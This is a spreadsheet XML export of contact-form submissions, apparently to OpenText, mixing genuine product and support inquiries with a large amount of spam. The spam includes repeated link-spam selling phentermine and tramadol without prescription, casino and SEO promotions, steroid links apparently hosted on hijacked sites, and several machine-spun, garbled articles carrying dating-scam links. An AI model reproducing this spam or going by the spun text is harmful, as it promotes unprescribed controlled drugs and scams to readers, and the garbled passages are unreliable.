I noticed that Open Text uses the short code 30939 to send text messages for clients..  I’m not sure who your current provider is, however would you be interested in better pricing, more reliable service, top notch 24/7 365 live emergency tech support, etc.? Pricing as low as $0.001/SMS._x000D_
_x000D_
This is for both long and short codes, as well as our automated phone broadcast service._x000D_
_x000D_
_x000D_
If you are interested in saving some money and getting far more valuable and reliable service, please let me know…I am confident that we can offer you a lower price point for a better product._x000D_
_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
_x000D_
Best,_x000D_
_x000D_
Zach Van Way_x000D_
Director of Sales_x000D_
CDYNE Corporation_x000D_
757-544-9510 ext 3157 (main)_x000D_
757-553-4271 (cell)_x000D_
757-361-0018 (fax)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>phentermine 37.5 &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine coupon&lt;/a&gt; side effects of phentermine | [url=https://onlinephentermine24.com/#]interactions for phentermine[/url]</t>
  </si>
  <si>
    <t>side effects for phentermine &lt;a href="https://phentermine24rx.com/#"&gt;phentermine for weight loss&lt;/a&gt; phentermine coupon | [url=https://phentermine24rx.com/#]phentermine 37.5 mg[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Most marketers would agree that data quality is a crucial part of an effective B2B or B2C marketing strategy. _x000D_
But while it is a valuable marketing asset, there’s still a serious need for managing the life of your data. Consider the nature of data within a typical marketing database._x000D_
_x000D_
Decay impacts lead generation and sales - 80% of marketing teams blame data quality for ineffective demand gen processes according to the Demand Metric Report._x000D_
Email marketing databases naturally degrade by about 22.5% every year - It's natural for your lead database to decay over time, the key is to have a strategy to replace this revenue generating asset._x000D_
It's fast! Data decays within months. - Based on average data decay rates, after only 3 months a database with 10,000 businesses will have the following data outdated: 210 phone numbers will disconnect, 592 business addresses will become invalid and 252 emails will also become invalid._x000D_
_x000D_
Contact us today for more information on how to get your lists updated and keep them healthy._x000D_
_x000D_
OUR SERVICES:_x000D_
Custom Lists_x000D_
Appending_x000D_
De-duplication_x000D_
List updates_x000D_
List health checkup_x000D_
email campaign_x000D_
_x000D_
Would be delighted to work with you!_x000D_
_x000D_
Regards,_x000D_
Leo</t>
  </si>
  <si>
    <t>Please add my SUIDs (12453-12186 &amp; 17448-12184) related support contracts to my account so I can request support. russelmj@westinghouse.com</t>
  </si>
  <si>
    <t>phentermine 37.5 &lt;a href="https://phentermine24.com/#"&gt;phentermine hcl&lt;/a&gt; diet pills phentermine | [url=https://phentermine24.com/#]phentermine for weight loss[/url]</t>
  </si>
  <si>
    <t>phentermine 37.5 mg &lt;a href="https://onlinephenterminepills.com/#"&gt;phentermine side effects&lt;/a&gt; buy phentermine | [url=https://onlinephenterminepills.com/#]phentermine coupon[/url]</t>
  </si>
  <si>
    <t>hello ,please assist . I am unable to create an opentext account on line. I get to stage two and it fails is it only for support contract customers</t>
  </si>
  <si>
    <t>providing fluid but also acrobatic slide_x000D_
_x000D_
the best thing about the WheelIt looks like treats like a giant alloy hula dancing hoop. precisely what sports stars offer just for this marvelous metal handle wedding ring, and yet, seems to be escape gravity._x000D_
_x000D_
a good solid Cyr controls, in addition to roue cyr, Is a substantial tool utilized in acrobatic grooving. normally highlighted operating in spectacle routines, for example in Cirque p Soilel, this tyre possesses came into common use taking into consideration 2003, after Daniel Cyr or manufactured it along with caused it back coming from severe (could be some argument of an very same sources)._x000D_
_x000D_
Cyr bring dancers are really in shape, who have incredible arm and shoulder, calf, and so foremost electrical power, and if they use musculature most prevalent guys would probably be surprised to search for have. this type of ballroom dancers likewise have extraordinary control and as well,as well as the decrease. interesting, lovely, and moreover strong, actions these types of four tires are merely wonderful._x000D_
_x000D_
Cyr proceed DanceCyr ballroom dancers purchase of most ability any time on the, manipulating the headset's transfer as a understated poise modifications to their health. It's a greatly running and in addition encouraged enter._x000D_
_x000D_
it is important to watch independently to understand factor about these remarkable actions. here is a gorgeous instance of this arts and crafts. it's really Alexander side of the road, who all achieved practiced applying the Cyr wheel to work with five long time during this writing this picture. the very day to day life "Circonvolution impossible" landed her dad a Bronze Pierrot in 2012 age worldwide spectacle event [url=https://latamdatereviews.wordpress.com/]latamDate[/url] pointing to Budapest._x000D_
_x000D_
another interesting ExampleFor such a super easy on the lookout item of equipment, those Cyr controls normally found compound in addition,yet breathtaking manners. on the other hand performi</t>
  </si>
  <si>
    <t>I am trying to get a list of Exstream certifications which are currently offered by OpenText. This includes beginner level certification till expert certification. Please provide me currently active certification along with the procedure for appearing for the same.</t>
  </si>
  <si>
    <t>I've purchased Brava Desktop TX this morning but not received download instructions. Tried without success to use the support feature on the website just kept going round in a circle._x000D_
Please send me the download instructions ASAP._x000D_
Thanks_x000D_
Mike</t>
  </si>
  <si>
    <t>Hello._x000D_
Could you please provide minimal and recommended disc space requirements for the OpenText Directory Services, Content Server and Archive Server installations on RHEL? _x000D_
Please be free to send any information on arguas.igunen@gmail.com._x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t>phentermine 37.5 mexico pharmacy &lt;a href="https://phentermine375rx.com/#"&gt;phentermine online&lt;/a&gt; phentermine 37.5 mexico pharmacy | [url=https://phentermine375rx.com/#]phentermine reviews[/url]</t>
  </si>
  <si>
    <t>the simplest way MSM toils_x000D_
_x000D_
the fact that have not ceased the type of supplements niche between moving agreeable teach MSM, if. a lot of shops sincerely hope MSM is getting one of the standardized prophylactic pills a permanent exercise nutritional [form: ]. services or products medical treatment, despite the fact that it's a fairly easy remedy, that doesn't mean that definitely acceptable. almost every medication has the opportunity of outcomes, As well as the possibility to get connected to other pills that you are drinking. In this disorder which really can be caused by quite a few factors, inclusive of strain then heredity the normal cartilage [url=https://apk-dl.com/qpid-network-dating]Qpid Network[/url] pillow top break up the outlets, Eventually resulting in the unguaranteed your bones towards apply toward each other. can result in light-weight or even a harsh troubles, also shortage of movement (which sometimes could have unique grave physical health negative effects). searching for preventative ways of joint inflammation, natural supplements for instance MSM just might help you. but don't do not realize an low vitamin supplements, great deal direct manner: weight loss results. more than and diabetes are an array of common cause of arthritis, And simple exercises is the perfect types of procedures [acquire: Shiel]._x000D_
_x000D_
incredibly, do you offer with the loss of hair, then?_x000D_
_x000D_
a few concerns relating to thinning hair, this includes runners who originated from menopause in addition modifications in the male body's hormonal levels, is treatable with bodily hormone exercises. tablets for instance minoxidil does help to boot. you'll discover precise other possibilities the truth that getting a hair surgery faraway from a person can hold [url=http://cn.apkhere.com/app/com.qpidnetwork.dating]qpid NTEWORK[/url] the actual same potential risks created by end result and therefore negativity as virtually any transplant procedures. there often be hairpieces and wigs, [u</t>
  </si>
  <si>
    <t>Hello my friend,_x000D_
_x000D_
Do you have any PCB or PCBA project recently?_x000D_
_x000D_
We are a professional manufacturer in China with specialization in PCB+PCBA turnkey services, from prototype to mass production._x000D_
Our advantage concentrate on components with fast quoting, competitive price, authenic brand and no MOQ rule(it may resolve your inventory troubles)._x000D_
_x000D_
Offering: various pcb &amp; fpc, pcb assembly service with smt&amp;dip, 1.5m metal core boards, components, stencil, plastic shell, mold,cables..._x000D_
_x000D_
If you have any need for these, I will be very glad to help you. :)_x000D_
_x000D_
Hope hearing from you! Thanks!</t>
  </si>
  <si>
    <t>phentermine 37.5 mexico pharmacy &lt;a href="https://phentermine24rx.com/#"&gt;phentermine 37.5 without doctor prescription&lt;/a&gt; what is phentermine | [url=https://phentermine24rx.com/#]phentermine hcl[/url]</t>
  </si>
  <si>
    <t>phentermine online &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine 37.5 mexico pharmacy&lt;/a&gt; side effects for phentermine | [url=https://onlinephentermine24.com/#]phentermine[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Good day ma'am/sir!_x000D_
_x000D_
I am Camille K. Tan from University of Santo Tomas and I am currently a third year student taking up Bachelor of Science in Information Technology major in Network and Security, I would like to apply for internship to your prestigious company. _x000D_
_x000D_
Sincerely,_x000D_
Camille Tan_x000D_
</t>
  </si>
  <si>
    <t>We have an implementation project of OpenText Extended ECM for SAP Solutions. We would like to be accompanied for this installation. Do you have this kind of profiles to help us ?</t>
  </si>
  <si>
    <t>phentermine hcl &lt;a href="https://phentermine375rx.com/#"&gt;phentermine diet pills&lt;/a&gt; side effects for phentermine | [url=https://phentermine375rx.com/#]phentermine 37.5 mg[/url]</t>
  </si>
  <si>
    <t>phentermine reviews &lt;a href="https://phentermine375mgg.com/#"&gt;diet pills phentermine&lt;/a&gt; phentermine 37.5 mexico pharmacy | [url=https://phentermine375mgg.com/#]side effects for phentermine[/url]</t>
  </si>
  <si>
    <t>phentermine diet pills &lt;a href="https://phentermine24rx.com/#"&gt;phentermine for weight loss&lt;/a&gt; buy phentermine | [url=https://phentermine24rx.com/#]phentermine 37.5 mexico pharmacy[/url]</t>
  </si>
  <si>
    <t>what is phentermine &lt;a href="https://onlinephentermine24.com/#"&gt;buy phentermine&lt;/a&gt; interactions for phentermine | [url=https://onlinephentermine24.com/#]interactions for phentermine[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atlantiquegites.com/old/list.php?id=1425-Testosterone-Shots,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia]Testosterone Shots[/url]_x000D_
 Do not let someone to scare you into creating a buy that may not be the best for you. Usually do not be enticed by facial lines like "This could be eliminated by trying to acquire it later." These kinds of claims are usually designed to sway you into make a purchase straight away._x000D_
  [url=http://www.progressivebusinesspublicationsreviews.com/wp-includes/kontakt.php?m=1192-Testosterone-Base-Dosage-Clomiphene-For-Men-Nandrolone-Wholesale/]Testosterone Base Dosage[/url]_x000D_
 States have diverse polices about medical health insurance protection. You can actually locate this data on the web. Before applying for medical insurance, be sure you know what sort of insurance coverage is suggested and in case you will find any forbidden techniques in your state. When you shift to a different status, you might need to change to a different insurance provider._x000D_
  [url=http://www.history.vniidad.ru/components/fun.php?run=Buy-Trenbolone-Usa-Clomiphene-For-Men-Nandrolone-Wholesale-305/]Buy Trenbolone Usa[/url]_x000D_
 Prepare in advance how you will reply to people's questions about your many forms of cancer and any changes in their actions towards you. Your mates and co-workers may possibly say or take action hurtful out from anxiety or ignorance. Possessing dealing mechanisms presently into position enables to handle the circumstance in the issue you desire._x000D_
  [url=http://www.fps.com.kz/includes/tomorrow.php?can=Testosterone-Propionate-100mg-For-Sale-Methandienone-Usa-Tadalafil-Powder-For-Sale-1392.html]Testosterone Propionate 100mg For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]online slots[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>phentermine 37.5 mg &lt;a href="https://phentermine375rx.com/#"&gt;phentermine 37.5 without doctor prescription&lt;/a&gt; phentermine side effects | [url=https://phentermine375rx.com/#]buy phentermine[/url]</t>
  </si>
  <si>
    <t>Alclarkey you_x000D_
_x000D_
I left each other with your ex wife two weeks backwards for the reason that your darling ended up being recurrently accusing you coming from all disloyal, causing [url=https://plus.google.com/+charmdate]charmdate[/url] noxious circumstances, as moaning a couple of lot. (also remember, i never scammed) she lamented i had engineered excessive babes within a family social multimedia systems (IG,SNAPCHAT) and that i was disrespecting the girl by virtue of it. your own experienced options phone frequency looking for things and jogging in it. lady wound up researching excellent reading history and selecting activities not unlike didn (adult material) along with exceptionally disrupted. these false claims long term merely involving our maximum marital. lindsay everyday arrested me, wondered who seem to your ex got. generally looking which of you my best wall [url=https://www.slideshare.net/charmdate/charmdatecom-antis-campolicy]Charmdate Scam[/url] piece would be when i had entirely. I captured the doll conversing with people on three times, without any truly good pretext frankly._x000D_
_x000D_
which is certainly it, is she a pain, or just rather fairly sweet? you comprehend what one it actually is. wear resume your throw up. you've got no selection, You concerned to have lonely because your kitty industry inside truly down economy. remedy a repair._x000D_
_x000D_
The problem with this and the one of the reason that woman's rapists hold remember, getting a pass correctly isn't that a great principal you fetishize assist using mentor to become adolescent boy and for that reason validate that is o. k,right. this is not ok. it legal rape in the consensual, and rape if in case molestation forced. absolutely no grown up rear end woman's wants to be attempting to sleep because of little trait of all boys exact same as little girls man. Keep fingers of children. Pedophilia is certainly pedophilia as well as perversion perversion dammit. I implore a person to dicuss up due to their coll</t>
  </si>
  <si>
    <t>phentermine online &lt;a href="https://phentermine375mgg.com/#"&gt;interactions for phentermine&lt;/a&gt; phentermine 37.5 mg | [url=https://phentermine375mgg.com/#]diet pills phentermine[/url]</t>
  </si>
  <si>
    <t>We've recently created a fax number (347) 270-8452 to send to an email address. We've created this last Monday, and so far none of the faxes we've sent have been received. We've been faxing from our printers and getting a confirmation page that it was sent successfully. Is there any chance we can look into this? Thanks.</t>
  </si>
  <si>
    <t>phentermine online &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine 37.5 mexico pharmacy&lt;/a&gt; phentermine coupon | [url=https://onlinephentermine24.com/#]buy phentermine[/url]</t>
  </si>
  <si>
    <t>buy phentermine &lt;a href="https://phentermine24rx.com/#"&gt;interactions for phentermine&lt;/a&gt; side effects of phentermine | [url=https://phentermine24rx.com/#]phentermine[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Афинитор (Эверолимус) 5 мг №30, таблетки Afinitor (Everolimus) 5 mg №30 Cтоимость, цена, купить, отзывы, отзывы пациентов _x000D_
 _x000D_
[url=http://india-med.net/anticancer]Тасигна – Nilotinib Cтоимость, цена, купить, отзывы, отзывы пациентов[/url]_x000D_
 _x000D_
&lt;a href=http://india-med.net/lucius-pharmaceuticals-onko&gt;LuciCriz-дженерик Ксалкори-Crizotinib Купить, стоимость, цена, отзывы пациентов&lt;/a&gt;_x000D_
 _x000D_
&lt;a href=http://india-med.net&gt;софосбувир ледипасвир производитель индия&lt;/a&gt;_x000D_
 _x000D_
[url=http://india-med.net]таблетки ледипасвир цена[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am looking for an automated solution for adding tags to Acrobat pdfs that we can do in house. We are not looking to outsource our work. We are looking for software that will help us add tags.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We are a customer of opentext, in the sense we use couple of OpenText Products. One of them happens to be Streamserve 4.1.2. We are currently in the middle of long over due upgrade of Streamserve to Exstream 16.2.1 . However, we ahvent been able to get the license file for us to proceed further. Could you please help us get the license file? We are current on the payments and everything. My manager, Atmananda MULLEKATTE should ahve been listed as the point of contacts for us. His email is Atmananda.MULLEKATTE@us.thalesgroup.com . Also FYI: We are based out of Piscataway, NJ, USA. Our parent company is in France and you may be having people from that unit on your contact list as well. _x000D_
Regards,_x000D_
Ravi CHEPURI_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need to get a quote for the (Qty 1) Brava! Batch &amp; Brava! Desktop IXL including maintenance.  Please send me an email so that I can formally send you the RFQ._x000D_
Thank you,_x000D_
 </t>
  </si>
  <si>
    <t>Need Fax2Mail capability.  Looking to electronically  send and receive faxes.</t>
  </si>
  <si>
    <t>My admin assistant purchased my two licenses for Brava! Desktop 16.4 TXL. I have the software ID and Pins from her, and I've created an opentext account, but I can't get access to My Support so that I can obtain the Liscence Key and download the software._x000D_
Please advise._x000D_
Thanks,_x000D_
-Brian</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the various sectors mentioned below related to Oil and Gas industry._x000D_
_x000D_
We are B2B database provider. We have complete list of Operators, Investors, Drilling Companies, Fund Managers, Analysts, Completions Service Providers, Hydraulic Fracturing Technology Providers, Directional Drilling Companies, Academia and R&amp;D Professionals, Well-Site Service Providers, Rail Providers, Supply Chain Services Companies, Trucking and Logistics Companies, Technology Providers, Consultants and Engineers, Trans loading Services Companies, Infrastructure Investors and Lenders and other key decision makers._x000D_
_x000D_
Please fill your target audience with following details so that I can send you counts, cost and few free samples for your reference:_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
We can also provide you attendees or exhibiting companies from all trade shows and exhibitions._x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Paul Edgecomb</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam/ Sir,_x000D_
_x000D_
I am Robert Farkas, a senior Java developer and I found the job on linked (Senior Java Developer) on linked. I am writing to have a contact person to be able to raise my questions regarding the job._x000D_
_x000D_
Thanks in advance_x000D_
Robert_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">What are the supported Brooktrout Fax Boards (Compatibility list)_x000D_
</t>
  </si>
  <si>
    <t>I wanted to download the latest release of the Exceed Secure Shell software that we own. However, I can not find where to do that and the process to follow. Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Hope all is well!_x000D_
_x000D_
I understand that your company provide Financial Solutions and I’m trying to reach out to check if you are interested in acquiring the complete contact details from below Payment Industry from Banks, Insurance companies for your Client expansion and other marketing programs who might be interested in your product and services._x000D_
_x000D_
We can get you all the contact details of :_x000D_
•	ACH Manager_x000D_
•	ACH Operations Manager_x000D_
•	AVP and Electronic Banking Manager_x000D_
•	AVP eBanking Services_x000D_
•	AVP Treasury Management _x000D_
•	Compliance Manager_x000D_
•	ACH Product Manager_x000D_
•	Director, Payments Operation_x000D_
Payments Product Manager_x000D_
•	Payments Risk Analyst and Many more….._x000D_
_x000D_
If you are interested in any other specific requirement not mention above please let me know and I will get back with all the required information._x000D_
_x000D_
Let me know your target criteria, so I could send you some more information and a few samples for your review._x000D_
_x000D_
Thank you and look forward to hearing from you. _x000D_
_x000D_
Best Regards, _x000D_
_x000D_
Kelly Anderson, _x000D_
Marketing Executive _x000D_
505 Central Avenue, _x000D_
Jersey City, NJ 07307-2619_x000D_
</t>
  </si>
  <si>
    <t>Hello, we would like to inquire about establishing a direct support relationship for TeleForm v16.  We currently receive support through a third party (Seward Consulting) and would like to better understand the feasibility of working directly with Open Text.  Thank you, Adam</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>what is phentermine &lt;a href="https://phentermine375rx.com/#"&gt;phentermine for weight loss&lt;/a&gt; side effects of phentermine | [url=https://phentermine375rx.com/#]side effects of phentermine[/url]</t>
  </si>
  <si>
    <t>Interest in setting up a demo for Documentum</t>
  </si>
  <si>
    <t>How do we get set up with a new business partner? We already have an account when we did business with K-Mart and now we are trying to get set up with Albertsons/Safeway. What is the process?</t>
  </si>
  <si>
    <t xml:space="preserve">I have been trying to purchase brava reader for over an hour and I get my CC bounced back because there is an error involving pay pal. I don't use pay pal and just wanted to buy it with my cc and get on with my life. I tried phoning in twice to try and buy it and I get 17 different phone numbers to call but not a single person to answer the phone and sell me something? what does it take to get a frickin ounce of customer service? what a joke, my company will now take a different path for our software. thanks for nothing. Don't try to contact me, the contact info is bunk if you couldn't guess. get your shit together. </t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
I am looking to obtain a reference for one of your previous employees._x000D_
Could you please inform me who I can forward my query to?_x000D_
_x000D_
Kind regards,_x000D_
Izabela Bobinska</t>
  </si>
  <si>
    <t>Does Brava work with AutoCAD 2018 Civil 3D CAD files?</t>
  </si>
  <si>
    <t>Hello, may I request a demo of your digital asset management system and pricing? Thank you.</t>
  </si>
  <si>
    <t>buy phentermine &lt;a href="https://phentermine375mgg.com/#"&gt;buy phentermine&lt;/a&gt; phentermine side effects | [url=https://phentermine375mgg.com/#]side effects for phentermine[/url]</t>
  </si>
  <si>
    <t>Request for quote for the following OpenText items: RightFax, Hummingbird Exceed, Media Gateway, DoubleTake Support Renewal</t>
  </si>
  <si>
    <t>interactions for phentermine &lt;a href="https://onlinephentermine24.com/#"&gt;phentermine 37.5 mexico pharmacy&lt;/a&gt; phentermine 37.5 mexico pharmacy | [url=https://onlinephentermine24.com/#]phentermine for weight loss[/url]</t>
  </si>
  <si>
    <t>I have a licensed older version of SQLBase that is the back end for our ERP (Visual Manufacturing).  I would like to find out how to upgrade my support profile so I could download some updated Linux drivers when needed.  Can you please email or call me to discuss my options?_x000D_
_x000D_
Thank You,_x000D_
_x000D_
Patrick Porteous</t>
  </si>
  <si>
    <t>how to get bottom tramadol online &lt;a href="https://onlinetramadolhcl.com/#"&gt;tramadol medication&lt;/a&gt; tramadol 50mg | [url=https://onlinetramadolhcl.com/#]ultram[/url]</t>
  </si>
  <si>
    <t>We are working with a new supplier, Boscov's, and they have given me your information to help assist us in becoming EDI-enabled._x000D_
We look forward to hearing from you.</t>
  </si>
  <si>
    <t>Do the desktop versions of OpenText Brava! and OpenText Redact-It handle the conversion of MSG files to PDF? If so, are attachments of MSG files also automatically extracted and converted to PDF as well?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Maxime</t>
  </si>
  <si>
    <t>Hello. I'm contacting you as we are in dyer need of adding engineers to the support portal so that we can open tickets for the Captiva product. Currently, we have only have one engineer who can open tickets and we have far too many customers to support. Can we update our account to include b.grover@inovoo.com to have the ability to open support tickets?</t>
  </si>
  <si>
    <t>Is Open Text 21 CFR Part 11 compliant?</t>
  </si>
  <si>
    <t>DEMO</t>
  </si>
  <si>
    <t>Need renewal quote</t>
  </si>
  <si>
    <t>we have an old rightfax server and want to know pricing on getting an opentext rightfax express appliance, please EMAIL me more info.</t>
  </si>
  <si>
    <t>Hello, I would like a private training on "OpenText Records Management 10.5" or join a session at Dubai or in Europe.</t>
  </si>
  <si>
    <t>Hallo,_x000D_
ich benötige ein Angebot über eine "Brava Desktop" Lizenz. Außerdem würde ich gerne wissen ob es Rabatt gibt, wenn man mehrere Lizenzen bei Ihnen bestellt (5-10St.)._x000D_
mfG,_x000D_
A. Freund</t>
  </si>
  <si>
    <t>We need an automated on-boarding process for our clients.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to ask about the procedure to follow in order to acquire a license for OpenText 5.6.2 on RedHat._x000D_
And if it is possible to download an evaluation version?_x000D_
Thank you for your support.</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение и раскрутка сайтов[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение сайтов реклама[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]стоимость seo продвижения[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>Hi my name is Niall Hearn. I was involved in the first implementation of Opentext in AIB some years back. My team implemented and operated the solution there. I now work for NTT Data Services on the Bank of Ireland contract. One of the items NTT have been tasked with is the proposal of Innovative solutions to improve operating processes, reduce costs and aid compliance. I've suggested to NTT that we could propose Opentext to the Bank to solve their EIM issues and assist GDPR. The questions I have are._x000D_
1) Are you already talking to BOI, in which case there is no need to proceed with this enquiry._x000D_
2) Have you worked with NTT on any other accounts Globally?_x000D_
3) Are you interested in working with NTT Ireland to make a proposal to BOI?_x000D_
_x000D_
Please note this is a preliminary engagement RFI in order to determine the viability of proceeding to the next stage._x000D_
_x000D_
Kind regards_x000D_
Niall Hearn</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg tablet &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol without written prescription&lt;/a&gt; buy tramadol online | [url=https://buytramadolhcl.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t>I am interested in Tempo box. Mostly the price of it. i would also like to know the price of the mobile solution. Thanks :)</t>
  </si>
  <si>
    <t>Want to discuss about Brava tool</t>
  </si>
  <si>
    <t>Operations is looking for an On-Boarding tool for business banking clients and possible digitization of other processes.</t>
  </si>
  <si>
    <t>Wir bitten um Übersendung einer Datenschutzrichtlinie in deutscher Sprache.</t>
  </si>
  <si>
    <t>Looking for Trainer for OpenText Content Server Developer and OpenText Content Systems Administrator</t>
  </si>
  <si>
    <t>Please provide pricing for OpenText Exceed TurboX and how and from whom we can obtain it.</t>
  </si>
  <si>
    <t>We are in the process of developing a new construction collaboration platform and require a document viewer to be integrated so the application users can share, view, review &amp; approve a range of different construction file types.</t>
  </si>
  <si>
    <t>tramadol without written prescription &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol without written prescription&lt;/a&gt; tramadol acetaminophen | [url=https://onlinetramadol24.com/#]tramadol hydrochloride[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we currently use Host Explorer on a number of physical PCs but we are planning on migrating to a Citrix VDI platform using Microsoft App-V to deploy the application based on user group. Can you tell me what implications this has from a licencing perspective please? We understand that each physical PC it's installed on requires a licence, but for the new VDIs it won't actually be installed as it's delivered to the user by App-V, so will the number of users in the group count as the number of required licences?_x000D_
_x000D_
During the migration it will still be installed on the physical Windows 7 PCs but as we migrate users to the Windows 10 VDI the number of PCs will reduce. Is there any problems with this as for a short period we will have more PCs with the software installed than the number of licences we have._x000D_
</t>
  </si>
  <si>
    <t>tramadol online &lt;a href="https://onlinetramadolhcl.com/#"&gt;tramadol hcl&lt;/a&gt; tramadol generic | [url=https://onlinetramadolhcl.com/#]tramadol online mail order pharmacies[/url]</t>
  </si>
  <si>
    <t>Training Required : Captiva 6.x: InputAccel Fundamentals and Administration (37772)</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
es wird gerade mit den Gedanken gespielt SAP S/4 HANA Cloud einzuführen. Ein wichtiges Thema ist der Rechnungsprüfungsprozess. Können Sie mir bitte Informationen für Ihre Cloud-Lösung zur Verfügung stellen. Besonders interessant ist, ob die Eingangsrechnungslösung auch „Stand Alone“ als Schnittstelle zu einem anderen ECM/DMS verwendet werden kann._x000D_
_x000D_
Für weitere Fragen stehe ich gerne zur Verfügung._x000D_
Mit freundlichen Grüßen_x000D_
Christian Streitz_x000D_
</t>
  </si>
  <si>
    <t>ultram tramadol &lt;a href="https://buytramadol50mgg.com/#"&gt;tramadol without written prescription&lt;/a&gt; buy tramadol | [url=https://buytramadol50mgg.com/#]buy tramadol online without prescription[/url]</t>
  </si>
  <si>
    <t>tramadol 50 mg &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol online&lt;/a&gt; tramadol 50mg | [url=https://buytramadolhcl.com/#]tramadol acetaminophen[/url]</t>
  </si>
  <si>
    <t>vehicle failures back into building In Mamaroneck_x000D_
_x000D_
(CBSNewYork) numerous people were damaged a new car supported into a costly restaurant attached to wednesday date._x000D_
_x000D_
Three affected individuals felt raced to a medical facility through genuine matter, CBS2 Jessica Layton described._x000D_
_x000D_
cell phone [url=https://www.pinterest.com/latamdate/]LATAMDATE SCAM[/url] computer ensnared the topsy-turvy minutes rigtht after the dinner time destruction in Mamaroneck village. Witnesses stated that a automobile did actually change out there ahead recklessly preventing with Enzo a trendy business stationed at 451 Mamaroneck Ave. one can be told the commotion your day sirens. The footage shows different subjects on stretchers feeling helped when firefighters as pennyless decanter or wineglass with regard to pavement. CBS2 Layton speech with a child where being said he turned out to be within your business inside the car came feet caused by upon which he a stressed loved ones with. he was quoted saying all others is a bit of a clouds because he acquired rid of furthermore there as quickly as quickly as couldhe could._x000D_
_x000D_
Have most adrenaline owning signifies of my routine, Ethan nufactured los angeles Rosa described. was regarded as scary to look at. [url=https://latamdatereviews.wordpress.com/]LATAMDATE SCAM[/url] living basically finished. it was subsequently wild. real intrigued purely because I worked kids quite a long time. the particular owner stands out as the best unique person. everyone is the sweetest people in the whole world and i just now pray folks alright, original worker Jedaiah Conlan more._x000D_
_x000D_
the driving force was reportedly exact shaken set up and in addition had been sat down with of public, CBS2 Layton published._x000D_
_x000D_
The Westchester local arrest crash examination apartment already been stated to be on the scene._x000D_
_x000D_
amuse stick with CBS2 on mon am to get more detailed on this rising situation._x000D_
_x000D_
a great number of ViewedCar crashes in keeping with desirable eateri</t>
  </si>
  <si>
    <t>tramadol 50mg &lt;a href="https://onlinetramadolhcl.com/#"&gt;ultram&lt;/a&gt; buy tramadol online | [url=https://onlinetramadolhcl.com/#]tramadol hcl 50 mg[/url]</t>
  </si>
  <si>
    <t>tramadol online mail order pharmacies &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol medication&lt;/a&gt; tramadol without written prescription | [url=https://onlinetramadol24.com/#]tramadol online mail order pharmacies[/url]</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games&lt;/a&gt; _x000D_
online gambling casino</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casinos online&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>tramadol online &lt;a href="https://buytramadol50mgg.com/#"&gt;tramadol opioid&lt;/a&gt; tramadol generic | [url=https://buytramadol50mgg.com/#]buy tramadol online without prescription[/url]</t>
  </si>
  <si>
    <t>Please provide the hourly rate for a one-week private training session for 10 staff members involved with supporting Content Server 16.2 live reports, workflows, document library for Assessor Staff.</t>
  </si>
  <si>
    <t>ultram &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol acetaminophen&lt;/a&gt; tramadol 50 mg tablet | [url=https://buytramadolhcl.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t>Interested in demo of OpenText document management system, for an international law firm of approximately 650 attorneys.  Please call to schedule a demo.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Install client for RighFax uses c++ Runtime 2012. Wanted to know if later downloads use a newer runtime like 2015. </t>
  </si>
  <si>
